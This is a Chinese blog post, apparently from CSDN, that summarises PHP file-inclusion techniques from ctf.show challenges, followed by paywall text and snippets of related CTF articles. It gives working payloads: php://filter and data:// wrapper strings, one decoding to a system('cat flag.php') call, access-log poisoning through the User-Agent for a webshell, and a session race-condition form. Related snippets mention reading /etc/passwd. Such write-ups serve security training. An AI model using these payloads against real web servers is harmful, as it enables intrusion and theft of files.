CTF文件包含

最新推荐文章于 2024-08-01 20:34:23 发布
最新推荐文章于 2024-08-01 20:34:23 发布
阅读量3.2k 收藏 4
点赞数
文章标签: 运维 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45086218/article/details/114188610
版权

文章目录

本文以ctf.show网站题目为例,总结ctf中的文件包含漏洞

php伪协议

?file=php://filter/convert.base64-encode/resource=flag.php

data伪协议

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

日志文件

日志文件路径:?file=/var/log/nginx/access.log
apache2:/var/log/apache2/access.log
直接访问会显示User-Agent的信息:
在这里插入图片描述
写入php文件,进行getshell
在这里插入图片描述
注意:访问日志文件只会显示前几次访问情况,要查看当前访问情况需要再一次访问

session文件竞争

https://blog.csdn.net/weixin_45669205/article/details/113709363

原理:

  1. session文件的命名格式是:
    sess_[PHPSESSID的值]
  2. session文件默认路径
    linux:/tmp 或 /var/lib/php/session
    Windows:C:\WINDOWS\Temp
  3. session.use_strict_mode默认值为0, 此时用户是可以自己定义Session ID
    比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag
  4. 在默认情况下,session.upload_progress.cleanup是开启的,一旦读取了所有POST数据,它就会清除进度信息(利用条件竞争应付这种情况)
<!DOCTYPE html>
<html>
<body>
<form action="http://1d293ab7-c661-4845-9ead-8ed9e8eacb82.chall.ctf.show:8080/" method="POST" enctype="multipart/form-data">
最低0.47元/天 解锁文章
Skn1fe
关注
文件包含ctf
qq_42812036的博客
10-14 2845
文件包含定义危险函数ctf文件包含PHP伪协议php://inputphp://filterdata://phar://zip://常见的敏感文件Windows 服务器敏感文件linux 服务器敏感文件 定义 在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外恩德文件,导致意外的文件泄露甚至恶意代码的注入。 严格来说文件包含算是代码注入的一种 危险函数 in...
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
CTFSHOW-文件包含13题
最新发布
qq_52579508的博客
08-01 390
传入file 值 ,然后include 包含传入的file发现打不开 ,靠 ,可能是过滤了,但是是能读/etc/passwd使用php://filter 伪协议读取 flag还有一种 data协议读取执行命令读取flagcat flag。
CTF-文件包含(持续更新)
m0_74317362的博客
07-28 1337
任意文件包含漏洞处理方法和实例
CTF-文件包含学习
weixin_44770698的博客
05-30 2233
CTFSHOW WEB-17 通过请求包查看到服务器为nginx,然后尝试查看一下/etc/passwd文件。 访问成功说明可以访问内网文件,然后尝试读取日志文件中的信息。nginx的日志文件为/var/log/nginx/access.log 发现日志文件中记录了UA,所以在数据包中写入系统执行命令,所以当我们在UA中写入系统执行命令的时候,再去包含,会当做php来执行。 发现存在着indes.php 和36d.php两个文件,查看36d.php文件中的内容。 WEB-18
网络安全CTF ——web_文件包含
weixin_63274653的博客
01-27 499
通过查看php.ini文件,发现allow_url_fopen 和 allow_url_include都是打开的,所以可以判断是远程文件包含。这里URL的意思是:读取index.php的内容,并把输入流进行base64编码,不进行base64编码就如法读取源码,就看不到flag。指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件。直接读取目标机上的Flag文件,通常可以通过操纵变量去读取。文件包含类型分为两种,一种是本地文件包含,另一种是远程文件包含。通过给定的URL查看源码。
ctf 文件包含总结
njqfb的博客
06-04 1655
php伪协议 文件包含用到伪协议的情况挺多 php://input php://input是个可以访问请求的原始数据的只读流,可以理解为读取到的POST上传的数据 当协议当作文件打开时,POST上传的内容相当于文件内容,enctype="multipart/form-data" 的时候 php://input 是无效的 利用: 使用php://input协议并POST要执行的代码 绕过file_get_contents函数进行的文件内容检测,比如函数打开一个文件,并验证文件内容是否为xxx,此时可以用php
对文件反转、倒置的工具,解决CTF和生活中的文件处理问题
12-29
在网络安全和信息技术领域,尤其是参与CTF(Capture The Flag)竞赛的过程中,经常遇到需要处理和分析各种文件的情况。"对文件反转、倒置的工具"是这类问题的一个解决方案,它可以帮助参赛者或IT专业人士在解密、...
webCTF文件包含
04-24
WebCTF文件包含是一种常见的Web安全漏洞,也被称为文件包含漏洞。它指的是在Web应用程序中,未正确过滤用户输入导致恶意用户可以通过构造特定的请求,将本应该被限制访问的文件包含到页面中。 文件包含漏洞通常存在...
ctf文件包含漏洞(一)
wlllllianqing的博客
10-06 2258
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数: include() include_once() require() require_once() (未完持续…) ...
CTF—文件
YkingH的博客
07-08 965
CTF文件包含 文件包含漏洞 定义:在通过php函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入 危险函数 include() include_once() require() require_once() 解题思路 本地文件包含:直接读取目标机上的Flag文件 远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看flag文件 php.ini allow_url_fopen = on/off 允许ur
文件包含漏洞 基础
weixin_50464560的博客
03-21 975
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
CTF之web学习记录 -- 文件包含
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
CTF文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 5万+
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
CG CTF 文件包含
qq_46389295的博客
02-23 280
题目链接 点击click me?no,跳转到添加链接描述 发现file=show.php 肯定是一个包含漏洞了,关于包含漏洞: 尝试了一下file=…/ 和test123.php发现没有用。。想到可以包含index.php来读取他自身的,也错了 翻书发现可以用php内置协议来读取php文件: http://4.chinalover.sinaapp.com/web7/index.php?file=...
CTF WEB】文件包含
weixin_30949361的博客
09-29 551
文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1></center> <!-- 据说flag在flag.php里 --> <?php error_reporting(0); $f=$_GET['file']; if(s...
CTF从入门到提升(十一)文件包含
anquanniu的博客
09-09 725
​​ Include stdio.h Import request 很多网站的admin(管理员)入口和user(用户)入口是分开的,登陆过程所调用的函数可能都是同一个函数,最后操作的表不同。如果调用的是同一个函数,网站一般分开两个文件存储:admin目录和user目录。在不同文件中,如果没有使用“文件包含”这个操作,同一个函数就会出现在两个文件中增加重复工作的工作量。但是如果使用“文件包含”...
文件包含ctfhub
weixin_43326436的博客
08-06 842
1.进入以后,发现的是 应该可以看到是一段代码,strpos这个函数就是查找相同字符串的位置,在这里就是查找和flag相同的字符串的位置,在下面又发现了一个我又一个链接是shell.txt,怎么使用它吗。点进去链接又是一句php,请求ctfhub意思。 2.因为是文件包含,所以直接构造payload 将?shell.txt构造, 所以直接 看到这个图片,利用火狐中的hackbar postdata 输入 ctfhub=system(‘cat /flag’); (system意思就是输出并返回最后一个sh
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值